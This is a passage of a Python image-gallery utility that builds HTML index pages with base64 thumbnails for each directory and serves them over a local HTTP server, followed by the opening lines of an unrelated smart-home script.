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RQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFABRRRQAUUUUAFFFFAH/9k='
class BackgroundIndexFileGenerator:
def __init__(self, dir_path):
self.dir_path = dir_path
self.thread = threading.Thread(target=self._process, args=())
self.thread.daemon = True
def _process(self):
_create_index_files(self.dir_path)
def run(self):
self.thread.start()
def _clean_up(paths):
"""
Clean up after ourselves, removing created files.
@param {[String]} A list of file paths specifying the files we've created
during run. Will all be deleted.
@return {None}
"""
print('Cleaning up')
# Iterate over the given paths, unlinking them
for path in paths:
print('Removing %s' % path)
os.unlink(path)
def _create_index_file(
root_dir, location, image_files, dirs, force_no_processing=False):
"""
Create an index file in the given location, supplying known lists of
present image files and subdirectories.
@param {String} root_dir - The root directory of the entire crawl. Used to
ascertain whether the given location is the top level.
@param {String} location - The current directory of the crawl. The index
file will be created here.
@param {[String]} image_files - A list of image file names in the location.
These will be displayed in the index file's gallery.
@param {[String]} dirs - The subdirectories of the location directory.
These will be displayed as links further down the file structure.
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process thumbnails, PIL images or anything. Simply index
<img> tags with original file src attributes.
@return {String} The full path (location plus filename) of the newly
created index file. Intended for usage cleaning up created files.
"""
# Put together HTML as a list of the lines we'll want to include
# Issue #2 exists to do this better than HTML in-code
header_text = \
'imageMe: ' + location + ' [' + str(len(image_files)) + ' image(s)]'
html = [
'<!DOCTYPE html>',
'<html>',
' <head>',
' <title>imageMe</title>'
' <style>',
' html, body {margin: 0;padding: 0;}',
' .header {text-align: right;}',
' .content {',
' padding: 3em;',
' padding-left: 4em;',
' padding-right: 4em;',
' }',
' .image {max-width: 100%; border-radius: 0.3em;}',
' td {width: ' + str(100.0 / IMAGES_PER_ROW) + '%;}',
' </style>',
' </head>',
' <body>',
' <div class="content">',
' <h2 class="header">' + header_text + '</h2>'
]
# Populate the present subdirectories - this includes '..' unless we're at
# the top level
directories = []
if root_dir != location:
directories = ['..']
directories += dirs
if len(directories) > 0:
html.append('<hr>')
# For each subdirectory, include a link to its index file
for directory in directories:
link = directory + '/' + INDEX_FILE_NAME
html += [
' <h3 class="header">',
' <a href="' + link + '">' + directory + '</a>',
' </h3>'
]
# Populate the image gallery table
# Counter to cycle down through table rows
table_row_count = 1
html += ['<hr>', '<table>']
# For each image file, potentially create a new <tr> and create a new <td>
for image_file in image_files:
if table_row_count == 1:
html.append('<tr>')
img_src = _get_thumbnail_src_from_file(
location, image_file, force_no_processing
)
link_target = _get_image_link_target_from_file(
location, image_file, force_no_processing
)
html += [
' <td>',
' <a href="' + link_target + '">',
' <img class="image" src="' + img_src + '">',
' </a>',
' </td>'
]
if table_row_count == IMAGES_PER_ROW:
table_row_count = 0
html.append('</tr>')
table_row_count += 1
html += ['</tr>', '</table>']
html += [
' </div>',
' </body>',
'</html>'
]
# Actually create the file, now we've put together the HTML content
index_file_path = _get_index_file_path(location)
print('Creating index file %s' % index_file_path)
index_file = open(index_file_path, 'w')
index_file.write('\n'.join(html))
index_file.close()
# Return the path for cleaning up later
return index_file_path
def _create_index_files(root_dir, force_no_processing=False):
"""
Crawl the root directory downwards, generating an index HTML file in each
directory on the way down.
@param {String} root_dir - The top level directory to crawl down from. In
normal usage, this will be '.'.
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process thumbnails, PIL images or anything. Simply index
<img> tags with original file src attributes.
@return {[String]} Full file paths of all created files.
"""
# Initialise list of created file paths to build up as we make them
created_files = []
# Walk the root dir downwards, creating index files as we go
for here, dirs, files in os.walk(root_dir):
print('Processing %s' % here)
# Sort the subdirectories by name
dirs = sorted(dirs)
# Get image files - all files in the directory matching IMAGE_FILE_REGEX
image_files = [f for f in files if re.match(IMAGE_FILE_REGEX, f)]
# Sort the image files by name
image_files = sorted(image_files)
# Create this directory's index file and add its name to the created
# files list
created_files.append(
_create_index_file(
root_dir, here, image_files, dirs, force_no_processing
)
)
# Return the list of created files
return created_files
def _get_image_from_file(dir_path, image_file):
"""
Get an instance of PIL.Image from the given file.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@return {PIL.Image} An instance of the image file as a PIL Image, or None
if the functionality is not available. This could be because PIL is not
present, or because it can't process the given file type.
"""
# Save ourselves the effort if PIL is not present, and return None now
if not PIL_ENABLED:
return None
# Put together full path
path = os.path.join(dir_path, image_file)
# Try to read the image
img = None
try:
img = Image.open(path)
except IOError as exptn:
print('Error loading image file %s: %s' % (path, exptn))
# Return image or None
return img
def _get_image_link_target_from_file(dir_path, image_file, force_no_processing=False):
"""
Get the value to be used as the href for links from thumbnail images. For
most image formats this will simply be the image file name itself. However,
some image formats (tif) are not natively displayable by many browsers and
therefore we must link to image data in another format.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process a thumbnail, PIL image or anything. Simply return the
image filename as src.
@return {String} The href to use.
"""
# If we've specified to force no processing, just return the image filename
if force_no_processing:
return image_file
# First try to get an image
img = _get_image_from_file(dir_path, image_file)
# If format is directly displayable in-browser, just return the filename
# Else, we need to return a full-sized chunk of displayable image data
if img.format.lower() in ['tif', 'tiff']:
return _get_image_src_from_file(
dir_path, image_file, force_no_processing
)
return image_file
def _get_image_src_from_file(dir_path, image_file, force_no_processing=False):
"""
Get base-64 encoded data as a string for the given image file's full image,
for use directly in HTML <img> tags, or a path to the original if image
scaling is not supported.
This is a full-sized version of _get_thumbnail_src_from_file, for use in
image formats which cannot be displayed directly in-browser, and therefore
need processed versions even at full size.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process a thumbnail, PIL image or anything. Simply return the
image filename as src.
@return {String} The base-64 encoded image data string, or path to the file
itself if not supported.
"""
# If we've specified to force no processing, just return the image filename
if force_no_processing:
if image_file.endswith('tif') or image_file.endswith('tiff'):
return UNSUPPORTED_IMAGE_TYPE_DATA
return image_file
# First try to get an image
img = _get_image_from_file(dir_path, image_file)
return _get_src_from_image(img, image_file)
def _get_index_file_path(location):
"""
Get the full file path to be used for an index file in the given location.
Yields location plus the constant INDEX_FILE_NAME.
@param {String} location - A directory location in which we want to create
a new index file.
@return {String} A file path for usage with a new index file.
"""
return os.path.join(location, INDEX_FILE_NAME)
def _get_server_port():
"""
Get the port specified for the server to run on. If given as the first
command line argument, we'll use that. Else we'll default to 8000.
@return {Integer} The port to run the server on. Default 8000, overridden
by first command line argument.
"""
global PORT
port = PORT
try:
port = int(sys.argv[1])
print("Setting port to", port)
except:
print("Could not set any relevant port from", sys.argv)
return port
def _get_src_from_image(img, fallback_image_file):
"""
Get base-64 encoded data as a string for the given image. Fallback to return
fallback_image_file if cannot get the image data or img is None.
@param {Image} img - The PIL Image to get src data for
@param {String} fallback_image_file - The filename of the image file,
to be used when image data capture fails
@return {String} The base-64 encoded image data string, or path to the file
itself if not supported.
"""
# If the image is None, then we can't process, so we should return the
# path to the file itself
if img is None:
return fallback_image_file
# Target format should be the same as the original image format, unless it's
# a TIF/TIFF, which can't be displayed by most browsers; we convert these
# to jpeg
target_format = img.format
if target_format.lower() in ['tif', 'tiff']:
target_format = 'JPEG'
# If we have an actual Image, great - put together the base64 image string
try:
bytesio = io.BytesIO()
img.save(bytesio, target_format)
byte_value = bytesio.getvalue()
b64 = base64.b64encode(byte_value)
return 'data:image/%s;base64,%s' % (target_format.lower(), b64)
except IOError as exptn:
print('IOError while saving image bytes: %s' % exptn)
return fallback_image_file
def _get_thumbnail_image_from_file(dir_path, image_file):
"""
Get a PIL.Image from the given image file which has been scaled down to
THUMBNAIL_WIDTH wide.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@return {PIL.Image} An instance of the thumbnail as a PIL Image, or None
if the functionality is not available. See _get_image_from_file for
details.
"""
# Get image
img = _get_image_from_file(dir_path, image_file)
# If it's not supported, exit now
if img is None:
return None
if img.format.lower() == 'gif':
return None
# Get image dimensions
img_width, img_height = img.size
# We need to perform a resize - first, work out the scale ratio to take the
# image width to THUMBNAIL_WIDTH (THUMBNAIL_WIDTH:img_width ratio)
scale_ratio = THUMBNAIL_WIDTH / float(img_width)
# Work out target image height based on the scale ratio
target_height = int(scale_ratio * img_height)
# Perform the resize
try:
img.thumbnail((THUMBNAIL_WIDTH, target_height), resample=RESAMPLE)
except IOError as exptn:
print('WARNING: IOError when thumbnailing %s/%s: %s' % (
dir_path, image_file, exptn
))
return None
# Return the resized image
return img
def _get_thumbnail_src_from_file(dir_path, image_file, force_no_processing=False):
"""
Get base-64 encoded data as a string for the given image file's thumbnail,
for use directly in HTML <img> tags, or a path to the original if image
scaling is not supported.
@param {String} dir_path - The directory containing the image file
@param {String} image_file - The filename of the image file within dir_path
@param {Boolean=False} force_no_processing - If True, do not attempt to
actually process a thumbnail, PIL image or anything. Simply return the
image filename as src.
@return {String} The base-64 encoded image data string, or path to the file
itself if not supported.
"""
# If we've specified to force no processing, just return the image filename
if force_no_processing:
if image_file.endswith('tif') or image_file.endswith('tiff'):
return UNSUPPORTED_IMAGE_TYPE_DATA
return image_file
# First try to get a thumbnail image
img = _get_thumbnail_image_from_file(dir_path, image_file)
return _get_src_from_image(img, image_file)
def _run_server(dir_path):
"""
Run the image server. This is blocking. Will handle user KeyboardInterrupt
and other exceptions appropriately and return control once the server is
stopped.
@return {None}
"""
# Get the port to run on
port = _get_server_port()
os.chdir(dir_path)
# Configure allow_reuse_address to make re-runs of the script less painful -
# if this is not True then waiting for the address to be freed after the
# last run can block a subsequent run
socketserver.ThreadingTCPServer.allow_reuse_address = True
# Create the server instance
server = ThreadingHTTPServer(('', port), SimpleHTTPRequestHandler)
# Print out before actually running the server (cheeky / optimistic, however
# you want to look at it)
print('Your images are at http://localhost:%d/%s' % (
port,
INDEX_FILE_NAME
))
# Try to run the server
try:
# Run it - this call blocks until the server is killed
server.serve_forever()
except KeyboardInterrupt:
# This is the expected way of the server being killed, since imageMe is
# intended for ad-hoc running from command line
print('User interrupted, stopping')
except Exception as exptn:
# Catch everything else - this will handle shutdowns via other signals
# and faults actually starting the server in the first place
print(exptn)
print('Unhandled exception in server, stopping')
def serve_dir(dir_path):
"""
Generate indexes and run server from the given directory downwards.
@param {String} dir_path - The directory path (absolute, or relative to CWD)
@return {None}
"""
# Create index files, and store the list of their paths for cleanup later
# This time, force no processing - this gives us a fast first-pass in terms
# of page generation, but potentially slow serving for large image files
print('Performing first pass index file generation')
created_files = _create_index_files(dir_path, True)
if (PIL_ENABLED):
# If PIL is enabled, we'd like to process the HTML indexes to include
# generated thumbnails - this slows down generation so we don't do it
# first time around, but now we're serving it's good to do in the
# background
print('Performing PIL-enchanced optimised index file generation in background')
background_indexer = BackgroundIndexFileGenerator(dir_path)
background_indexer.run()
# Run the server in the current location - this blocks until it's stopped
_run_server(dir_path)
# Clean up the index files created earlier so we don't make a mess of
# the image directories
_clean_up(created_files)
def parse_args():
parser = argparse.ArgumentParser(description='Transform Tagged Files')
parser.add_argument('-v', '--verbose', action="store_true", help='verbose output')
parser.add_argument('-n', '--images_per_row', type=int, help='Images per row', default=IMAGES_PER_ROW)
parser.add_argument('-w', '--thumbnail_width', type=int, help='Width of each thumbnail', default=THUMBNAIL_WIDTH)
parser.add_argument('port', type=int, help='Port for image-serve', default=PORT)
parser.add_argument('-f', '--folder_path', type=str, help='Folder path to serve html', default='.')
return parser.parse_args()
def load_global_variables(args):
# todo: Use a cleaner approach afterwards
global IMAGES_PER_ROW, THUMBNAIL_WIDTH, PORT
IMAGES_PER_ROW = args.images_per_row
THUMBNAIL_WIDTH = args.thumbnail_width
PORT = args.port
if __name__ == '__main__':
# Generate indices and serve from the current directory downwards when run
# as the entry point
args = parse_args()
load_global_variables(args)
serve_dir(args.folder_path)
|
dg-SmartHome-cp.py
|
#from secure import NAME, TOKEN, TOPIC
import os
NAME = os.environ.get('NAME', None)
